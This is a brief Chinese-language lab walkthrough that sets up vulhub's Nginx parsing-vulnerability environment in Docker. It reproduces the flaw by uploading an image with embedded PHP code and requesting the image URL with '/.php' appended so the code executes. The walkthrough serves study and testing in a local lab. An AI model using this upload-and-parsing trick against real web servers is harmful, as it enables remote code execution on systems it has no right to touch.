环境
漏洞环境使用vulhub和ubuntu搭建
# 下载vulhub
$ sudo git clone https://github.com/vulhub/vulhub.git
# 启动环境
$ cd vulhub/nginx/nginx_parsing_vulnerability
$ sudo docker-compose build
$ sudo docker-compose up -d
# 查看nginx是否开启
$ sudo netstat -tunlp | grep 80
访问http://IP/,看到这个页面表示漏洞环境搭建成功
漏洞复现
我们找到一张图片,使用notepad++打开,添加php代码
上传文件,显示上传文件的文件路径
访问图片url,图片正常显示
http://IP/uploadfiles/26ba7cbd4f7f38baad96e78b861378c8.png
使用payload,看到我们写入图片的php代码已被执行
http://IP/uploadfiles/26ba7cbd4f7f38baad96e78b861378c8.png/.php